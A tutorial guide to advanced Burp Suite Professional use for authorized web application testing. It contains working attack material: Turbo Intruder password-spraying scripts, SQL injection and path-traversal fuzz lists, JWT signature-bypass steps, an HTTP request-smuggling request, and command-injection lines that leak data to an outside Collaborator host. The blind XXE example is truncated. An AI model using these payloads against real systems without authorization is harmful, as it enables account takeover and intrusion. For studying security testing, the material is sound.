Burp Suite Professional: Advanced Web Testing Techniques

Burp Suite Professional is the industry-standard platform for web application security testing, used by professionals at major security consultancies, bug bounty hunters, and red teams worldwide. Its integrated proxy, scanner, and toolset provide a comprehensive environment for testing every layer of web application security. This guide covers the advanced features and techniques that distinguish expert Burp Suite users from beginners.

Proxy Configuration and Advanced Interception

Browser and Certificate Setup

# Start Burp Suite
# Proxy > Options > Add listener: 127.0.0.1:8080

# Configure browser proxy:
# Firefox: Settings > Network Settings > Manual Proxy
# HTTP Proxy: 127.0.0.1, Port: 8080, Use for all protocols

# Install Burp CA certificate:
# Navigate to http://burpsuite (while proxy is active)
# Download CA certificate
# Firefox: Settings > Privacy > Certificates > Import
# Chrome: Settings > Privacy > Manage Certificates > Import

# Using FoxyProxy for easy toggle:
# Install FoxyProxy Standard extension
# Add profile: Host=127.0.0.1, Port=8080
# Toggle with one click

Interception Rules and Match/Replace

# Proxy > Options > Match and Replace — powerful header/body modification
# Examples:

# Always add an auth header to every request
# Type: Request Header
# Match: (empty — adds new header)
# Replace: Authorization: Bearer YOUR_TEST_TOKEN

# Replace User-Agent to simulate mobile
# Type: Request Header
# Match: ^User-Agent.*$
# Replace: User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X)

# Strip security headers from responses (to test without CSP)
# Type: Response Header
# Match: ^Content-Security-Policy.*$
# Replace: (empty)

# Remove cookie HttpOnly flag (to enable JavaScript cookie access testing)
# Type: Response Header
# Match: ;? HttpOnly
# Replace: (empty)

Intruder: Attack Types and Configuration

Burp Intruder automates customized attacks against web parameters. Understanding the four attack types is critical for efficient use.

Attack Types Explained

Intruder Configuration Example: Password Spraying

# 1. Capture login POST request in Proxy
# 2. Right-click > Send to Intruder
# 3. Positions tab: Auto-detect or manually mark:
#    username=§admin§&password=§password§
# 4. Attack type: Pitchfork
# 5. Payload Sets:
#    Position 1: Load users.txt
#    Position 2: Load passwords.txt
# 6. Options:
#    Grep - Match: "incorrect password" (to flag failures)
#    Grep - Extract: Extract session token from successful response
# 7. Request Engine: 10 threads (be mindful of rate limits)

# Payload processing options:
# - Hash (MD5/SHA-1/SHA-256) — hash payloads before sending
# - URL encode / URL decode
# - Base64 encode / decode
# - Add prefix/suffix
# - Custom rules (regex replace)

Intruder for Fuzzing

# SQL injection fuzzing
# Position: id=§1§
# Attack type: Sniper
# Payload: Simple List with:
# '
# ''
# ` (backtick)
# ')
# '))
# 1 OR 1=1
# 1 AND 1=2
# 1' ORDER BY 1--
# 1 UNION SELECT NULL--

# Compare response lengths and status codes to find anomalies

# Path traversal fuzzing
# Position: file=§etc/passwd§
# Payload list: SecLists/Fuzzing/LFI/

# Header injection fuzzing (HTTP Response Splitting)
# Inject into headers: Host, X-Forwarded-Host, etc.

Repeater: Manual Request Manipulation

# Send any request to Repeater: Right-click > Send to Repeater (Ctrl+R)
# Modify and replay with Ctrl+Space

# Repeater tips:
# - Right-click in request panel > Request in browser > In current browser session
#   (Sends the request via your browser with your session cookies)
# - Use Inspector panel (right side) for structured JSON/XML editing
# - HTTP/2 toggle: Switch between HTTP/1.1 and HTTP/2 to test protocol differences
# - Follow redirects: Click "Follow redirect" button
# - History: View all requests sent from this Repeater tab

# Useful Repeater workflows:
# 1. Capture authentication request > Send to Repeater > Test auth bypass
# 2. Find parameter reflection > Send to Repeater > Test XSS/injection
# 3. Test API endpoints with different HTTP methods (GET→POST→PUT→DELETE)
# 4. Test authorization by swapping session tokens between users

Scanner: Active and Passive Scanning

Active Scanning Configuration

# Dashboard > New Scan > URL-based scan
# Or: Right-click any request in Proxy/Target > Active Scan

# Scan configuration options:
# - Audit checks: Select specific vulnerability classes
#   - SQLi, XSS, XXE, SSRF, Path traversal, Code injection, etc.
# - Handling application errors: Stop scanning if too many errors
# - Scan limits: Max requests per second, timeout
# - Custom insertion points: Where to inject payloads
# - Session handling: Use macros for tokens that expire

# Passive scanning (always on):
# Burp passively analyzes all proxied traffic
# Detects: reflected input, insecure cookies, CSRF, mixed content, etc.
# View: Target > Site Map > Issues (left panel)

# Issue severity filter:
# High: SQL injection, RCE
# Medium: CSRF, stored XSS
# Low: Missing headers
# Information: Possible issues, info disclosure

Session Handling for Authenticated Scans

# Project > Settings > Session > Session Handling Rules

# Macro-based token refresh:
# 1. Record a macro that performs login
# 2. Create session handling rule: Run macro before each request
# 3. Rule scope: Include URLs matching your target scope

# Cookie jar:
# Burp maintains a shared cookie jar
# Session handling rules can use cookies from the jar
# Useful for multi-step authentication flows

Key Extensions (BApp Store)

Autorize — Authorization Testing

# Autorize automatically re-plays every request with a lower-privilege session
# Detects authorization bypass (IDOR, privilege escalation)

# Setup:
# 1. Install Autorize from BApp Store
# 2. In Autorize tab: Add low-privilege cookie/auth header
# 3. Browse app as high-privilege user
# 4. Autorize replays each request with low-privilege credentials
# 5. Green = Unauthorized (correctly blocked)
#    Red = Bypassed (low-priv can access high-priv content) — VULNERABILITY
#    Yellow = Needs manual review

# Configuration:
# Interception filters: Only intercept in-scope requests
# Detection settings: Compare response length, status code, or custom regex

Logger++ — Enhanced Logging

# Logger++ provides advanced filtering and logging of all Burp traffic
# Features:
# - More powerful filtering than Burp's native HTTP History
# - Color coding by response status, size, time
# - Live filtering with regex
# - Export filtered logs to CSV/JSON
# - Grep-based highlighting

# Useful filters:
# Response.Status == 200 AND Request.Method == POST
# Response.Body CONTAINS "password"
# Request.Host CONTAINS "api."
# Request.Path CONTAINS "admin"
# Response.Time > 5000   (slow responses — time-based SQLi candidates)

Turbo Intruder — High-Speed Attacks

# Turbo Intruder is a Burp extension for extremely high-speed fuzzing
# Uses Python for payload generation, bypasses Community Edition rate limit

# Install from BApp Store
# Right-click request > Extensions > Turbo Intruder

# Example script for password spraying:
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=10,
                           requestsPerConnection=100,
                           pipeline=False)
    for password in open('/usr/share/wordlists/rockyou.txt'):
        engine.queue(target.req, password.rstrip())

def handleResponse(req, interesting):
    if req.status == 302 or 'Welcome' in req.response:
        table.add(req)

# Race condition testing:
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           engine=Engine.BURP2)
    for i in range(50):
        engine.queue(target.req)

CSRF Tester and JWT Editor

# JWT Editor (essential for JWT attack testing)
# Install from BApp Store
# Features:
# - Decode/modify/re-sign JWTs inline in Repeater
# - Algorithm confusion attacks (RS256 → HS256)
# - None algorithm bypass
# - Embedded JWK injection
# - Key confusion attack

# In Repeater: JSON Web Tokens tab appears automatically for JWT requests
# Click "Attack" to see available JWT attack options

JWT Attack Techniques

Algorithm Confusion (RS256 to HS256)

# JWT uses RS256 (asymmetric) — server verifies with public key
# Attack: Change algorithm to HS256 (symmetric) and sign with the public key

# 1. Obtain the server's RSA public key (/.well-known/jwks.json or /jwks.json)
# 2. In JWT Editor extension: New Symmetric Key > Paste public key as k value
# 3. In Repeater: JWT Editor tab > Change alg to HS256
# 4. Sign with the symmetric key (which contains the public key)
# 5. Server may verify with public key used as HMAC secret — BYPASS

# "alg: none" attack
# Some servers accept tokens with no signature
# Change algorithm to "none", remove signature
# Header: {"alg":"none","typ":"JWT"}
# Remove signature entirely: header.payload.

# In JWT Editor:
# Select "Alg: none" attack option
# Or manually: Delete signature, keep trailing dot

JWT Embedded JWK Attack

# Some libraries trust a JWK embedded in the JWT header itself
# Attack: Generate your own RSA key pair, embed public key in header, sign with private key

# JWT Editor:
# 1. Generate new RSA key pair (New RSA Key)
# 2. In Repeater, select JWT > Attack > Embedded JWK
# 3. Select your generated key
# 4. Modify claims (e.g., "sub": "admin")
# 5. Send — server may trust the embedded key

HTTP Request Smuggling

HTTP request smuggling exploits discrepancies in how front-end and back-end servers parse HTTP requests, particularly around Content-Length and Transfer-Encoding headers.

Basic CL.TE Smuggling

# CL.TE: Front-end uses Content-Length, back-end uses Transfer-Encoding
# The "smuggled" request prefix is interpreted by back-end as start of next request

POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

# IMPORTANT: Must disable content-length update in Repeater:
# Repeater > Request attributes > uncheck "Update Content-Length"

# HTTP/2 Request Smuggling (modern attack surface)
# Burp Suite > Repeater > HTTP/2 tab
# Use :method, :path, :authority pseudo-headers
# Inject headers with CRLF (\r\n) in HTTP/2 header values

HTTP Request Smuggling with Burp Scanner

# Burp Pro automatically detects request smuggling:
# Scan > Audit > Request Smuggling checks enabled by default
# Manual testing: HTTP Request Smuggler extension (BApp Store)

# Install HTTP Request Smuggler:
# BApp Store > HTTP Request Smuggler
# Extensions > HTTP Request Smuggler > Smuggle Probe
# Target a request > Right-click > Smuggle Probe
# Automatically tests CL.TE, TE.CL, TE.TE variants

Burp Collaborator: Out-of-Band Vulnerability Detection

Burp Collaborator provides a server that detects DNS lookups, HTTP connections, and SMTP interactions caused by out-of-band vulnerabilities like blind SSRF, blind XXE, blind SQL injection, and OS command injection.

# Access Collaborator:
# Burp > Burp Collaborator client
# Click "Copy to clipboard" to get a unique subdomain
# e.g., xyz1234.oastify.com (Burp Professional)

# Blind SSRF test:
# In a URL parameter that may cause server-side requests:
POST /api/webhook HTTP/1.1
Host: target.com
Content-Type: application/json

{"url": "http://xyz1234.oastify.com/ssrf-test"}

# If the server makes a request, Collaborator receives it
# Confirms SSRF even if no response is returned to you

# Blind XXE via external entity:
POST /upload HTTP/1.1
Content-Type: application/xml



]>
&xxe;

# Blind OS Command Injection:
# Linux: nslookup `whoami`.xyz1234.oastify.com
# Windows: nslookup %COMPUTERNAME%.xyz1234.oastify.com

# Check results in Collaborator client:
# Interactions tab shows all received DNS/HTTP/SMTP interactions
# Each interaction shows: timestamp, type, full request details

Target Site Map and Scope Configuration

# Define scope before scanning:
# Target > Scope > Add target
# Use regex for flexible scope:
# Protocol: https, Host: .*\.target\.com, Port: *, File: .*

# Site Map features:
# - Tree view: Endpoint discovery
# - Right-click endpoint > Add to scope / Spider / Active Scan
# - Filter: Show only in-scope, only flagged items, by status code
# - Compare Site Maps: Track discovered endpoints across sessions

# Spider configuration:
# Target > Site Map > Right-click > Spider this host
# Or: Engagement tools > Discover content (active dir enumeration)

# Engagement tools (Professional):
# Target > right-click host > Engagement tools
# - Find comments: Extract all HTML comments
# - Find scripts: List all JavaScript files
# - Search: Full-text search across all captured responses
# - Discover content: Brute-force directories and files

Professional Workflow Tips

# Save and restore project state
# File > New project from disk / Open existing project
# All history, scan results, and settings preserved

# Keyboard shortcuts:
# Ctrl+R: Send to Repeater
# Ctrl+I: Send to Intruder
# Ctrl+S: Send to Scanner
# Ctrl+Shift+U: URL encode selection
# Ctrl+Shift+B: Base64 encode selection
# Ctrl+Shift+H: HTML encode selection
# Ctrl+Z: Undo in editors

# Response comparison:
# In Intruder results, select two responses
# Right-click > Show response in Comparer
# Or: Burp > Comparer tab for side-by-side diff

# Macros for complex authentication:
# Project Settings > Sessions > Macros
# Record macro: Click Record, perform login flow, stop
# Use in session handling rules for authenticated scanning